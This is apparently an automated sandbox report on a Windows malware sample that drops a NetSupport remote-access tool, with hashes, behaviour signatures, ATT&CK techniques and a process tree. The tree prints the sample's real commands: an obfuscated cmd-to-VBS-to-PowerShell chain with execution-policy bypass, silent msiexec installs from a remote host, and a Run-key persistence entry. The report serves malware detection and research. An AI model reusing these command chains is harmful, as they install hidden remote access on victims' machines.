Analysis

  • max time kernel
    106s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    29-10-2020 16:41

General

  • Target

    signed_gate6.bin.exe

  • Size

    3.8MB

  • MD5

    5b31c8bf67eea804fa636876a1828d20

  • SHA1

    0f9862e659b5cd1233a7796d51e062d217df3c75

  • SHA256

    a61bc88a1a994952b622c7eb01bfa9be65591c8cb5e69c4dae56edbd94deb384

  • SHA512

    bf7175eb313fd1949e36056d478699327a05cbff1d5a0e68c4664df7c202197a25332ba270c8a5300367cf8d4b711d682d535071ce6c11ed125dd78c75f2909b

Malware Config

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Use of msiexec (install) with remote resource 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • JavaScript code in executable 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 67 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\signed_gate6.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\signed_gate6.bin.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c ec^h^o CreateObject("Wscript.Shell").Run "cmd /c cmd /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1", 0, False > %appdata%\NWNCDTYSWS.vb^s& wscript %appdata%\NWNCDTYSWS.vb^s& del %appdata%\NWNCDTYSWS.vb^s
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1572
      • C:\Windows\system32\wscript.exe
        wscript C:\Users\Admin\AppData\Roaming\NWNCDTYSWS.vbs
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c cmd /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:788
          • C:\Windows\system32\cmd.exe
            cmd /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1552
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1492
              • C:\Windows\system32\msiexec.exe
                "C:\Windows\system32\msiexec.exe" /i http://safuuf7774.pw/iplog/newg.php?hst=installing_TUICJFPF /q
                7⤵
                • Use of msiexec (install) with remote resource
                • Suspicious use of AdjustPrivilegeToken
                PID:552
              • C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v fonthost /t REG_SZ /d C:\Users\Admin\AppData\Roaming\W4mcAMtZ\fonthost.exe /f
                7⤵
                • Adds Run key to start application
                • Modifies registry key
                PID:1796
              • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\fonthost.exe
                "C:\Users\Admin\AppData\Roaming\W4mcAMtZ\fonthost.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:1964
              • C:\Windows\system32\msiexec.exe
                "C:\Windows\system32\msiexec.exe" /i http://safuuf7774.pw/iplog/newg.php?hst=installed_TUICJFPF /q
                7⤵
                • Use of msiexec (install) with remote resource
                • Suspicious use of AdjustPrivilegeToken
                PID:1436
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blacklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    PID:1792

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

2
T1112

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1
    MD5

    ea776dea84f070b7ef2228bd65bf2a13

    SHA1

    8227cb202a56b0847544af4d93b3b614ace6e4bd

    SHA256

    1ee81d0d3dc5c9cfe7ad5fb9d2e3bf76bb23168d0452605aaaf04b193f802855

    SHA512

    d9f7387889be3b2c581a97b2ddadbe134336ec2bdd13ba802475e3092b2798d04fad127c60a3fe2da6e83dcebdda80570e9da7d05747790997047367c5724fd1

  • C:\Users\Admin\AppData\Roaming\NWNCDTYSWS.vbs
    MD5

    5f2b031697e9070572c3f2341b629efd

    SHA1

    5de1c2a0424553f94c604b598b68a782fe95e071

    SHA256

    5d13210671707faf8a4b9367495a95c2170a647e0b7c7bb258b54607fd851f68

    SHA512

    cfac5cf273f755516db5ae5f6724df57f6aa8eed7dd5d15fb867a3123b9974453731ed0ec5ca2fe43c1feacb000a45b463df20086e9304b875ea91453b18107d

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\HTCTL32.DLL
    MD5

    2d3b207c8a48148296156e5725426c7f

    SHA1

    ad464eb7cf5c19c8a443ab5b590440b32dbc618f

    SHA256

    edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

    SHA512

    55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\MSVCR100.dll
    MD5

    0e37fbfa79d349d672456923ec5fbbe3

    SHA1

    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

    SHA256

    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

    SHA512

    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\NSM.LIC
    MD5

    7067af414215ee4c50bfcd3ea43c84f0

    SHA1

    c331d410672477844a4ca87f43a14e643c863af9

    SHA256

    2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12

    SHA512

    17b888087192bcea9f56128d0950423b1807e294d1c4f953d1bf0f5bd08e5f8e35afeee584ebf9233bfc44e0723db3661911415798159ac118c8a42aaf0b902f

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\PCICL32.dll
    MD5

    00587238d16012152c2e951a087f2cc9

    SHA1

    c4e27a43075ce993ff6bb033360af386b2fc58ff

    SHA256

    63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

    SHA512

    637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\client32.ini
    MD5

    e67dad741ad8b2b2ea900d5051abbdf2

    SHA1

    da59fb331870bb13d8eae5b266bae76e5e9221a3

    SHA256

    c76aada941385472da3ec3c730f3d837832f62721f7a405f06cc19f1b8ad8523

    SHA512

    f4844cba552c355fe9c9f8b624b8c4af96fbc585525da7ad472a31355e1299697fb08afd58356ee4d19cad3278886745113f14f223e0fef7d8bee856c942910b

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\fonthost.exe
    MD5

    8d9709ff7d9c83bd376e01912c734f0a

    SHA1

    e3c92713ce1d7eaa5e2b1fabeb06cdc0bb499294

    SHA256

    49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3

    SHA512

    042ad89ed2e15671f5df67766d11e1fa7ada8241d4513e7c8f0d77b983505d63ebfb39fefa590a2712b77d7024c04445390a8bf4999648f83dbab6b0f04eb2ee

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\pcicapi.dll
    MD5

    dcde2248d19c778a41aa165866dd52d0

    SHA1

    7ec84be84fe23f0b0093b647538737e1f19ebb03

    SHA256

    9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

    SHA512

    c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\pcichek.dll
    MD5

    a0b9388c5f18e27266a31f8c5765b263

    SHA1

    906f7e94f841d464d4da144f7c858fa2160e36db

    SHA256

    313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

    SHA512

    6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

  • \Users\Admin\AppData\Local\Temp\nsiCE29.tmp\System.dll
    MD5

    fbe295e5a1acfbd0a6271898f885fe6a

    SHA1

    d6d205922e61635472efb13c2bb92c9ac6cb96da

    SHA256

    a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1

    SHA512

    2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

  • \Users\Admin\AppData\Local\Temp\nsiCE29.tmp\blowfish.dll
    MD5

    5afd4a9b7e69e7c6e312b2ce4040394a

    SHA1

    fbd07adb3f02f866dc3a327a86b0f319d4a94502

    SHA256

    053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae

    SHA512

    f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

  • \Users\Admin\AppData\Local\Temp\nsiCE29.tmp\blowfish.dll
    MD5

    5afd4a9b7e69e7c6e312b2ce4040394a

    SHA1

    fbd07adb3f02f866dc3a327a86b0f319d4a94502

    SHA256

    053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae

    SHA512

    f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

  • \Users\Admin\AppData\Roaming\W4mcAMtZ\HTCTL32.DLL
    MD5

    2d3b207c8a48148296156e5725426c7f

    SHA1

    ad464eb7cf5c19c8a443ab5b590440b32dbc618f

    SHA256

    edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

    SHA512

    55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

  • \Users\Admin\AppData\Roaming\W4mcAMtZ\PCICHEK.DLL
    MD5

    a0b9388c5f18e27266a31f8c5765b263

    SHA1

    906f7e94f841d464d4da144f7c858fa2160e36db

    SHA256

    313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

    SHA512

    6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

  • \Users\Admin\AppData\Roaming\W4mcAMtZ\PCICL32.DLL
    MD5

    00587238d16012152c2e951a087f2cc9

    SHA1

    c4e27a43075ce993ff6bb033360af386b2fc58ff

    SHA256

    63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

    SHA512

    637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

  • \Users\Admin\AppData\Roaming\W4mcAMtZ\msvcr100.dll
    MD5

    0e37fbfa79d349d672456923ec5fbbe3

    SHA1

    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

    SHA256

    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

    SHA512

    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

  • \Users\Admin\AppData\Roaming\W4mcAMtZ\pcicapi.dll
    MD5

    dcde2248d19c778a41aa165866dd52d0

    SHA1

    7ec84be84fe23f0b0093b647538737e1f19ebb03

    SHA256

    9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

    SHA512

    c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

  • memory/552-18-0x0000000000000000-mapping.dmp
  • memory/552-37-0x00000000022C0000-0x00000000022C4000-memory.dmp
    Filesize

    16KB

  • memory/788-6-0x0000000000000000-mapping.dmp
  • memory/984-36-0x000007FEF7D20000-0x000007FEF7F9A000-memory.dmp
    Filesize

    2.5MB

  • memory/1436-27-0x0000000000000000-mapping.dmp
  • memory/1436-35-0x00000000021B0000-0x00000000021B4000-memory.dmp
    Filesize

    16KB

  • memory/1492-11-0x0000000002280000-0x0000000002281000-memory.dmp
    Filesize

    4KB

  • memory/1492-12-0x000000001AC60000-0x000000001AC61000-memory.dmp
    Filesize

    4KB

  • memory/1492-13-0x0000000002430000-0x0000000002431000-memory.dmp
    Filesize

    4KB

  • memory/1492-17-0x000000001C3F0000-0x000000001C3F1000-memory.dmp
    Filesize

    4KB

  • memory/1492-10-0x000007FEF5C90000-0x000007FEF667C000-memory.dmp
    Filesize

    9.9MB

  • memory/1492-9-0x0000000000000000-mapping.dmp
  • memory/1492-16-0x000000001C320000-0x000000001C321000-memory.dmp
    Filesize

    4KB

  • memory/1492-14-0x00000000025D0000-0x00000000025D1000-memory.dmp
    Filesize

    4KB

  • memory/1552-8-0x0000000000000000-mapping.dmp
  • memory/1572-3-0x0000000000000000-mapping.dmp
  • memory/1624-4-0x0000000000000000-mapping.dmp
  • memory/1624-7-0x00000000026C0000-0x00000000026C4000-memory.dmp
    Filesize

    16KB

  • memory/1796-19-0x0000000000000000-mapping.dmp
  • memory/1964-20-0x0000000000000000-mapping.dmp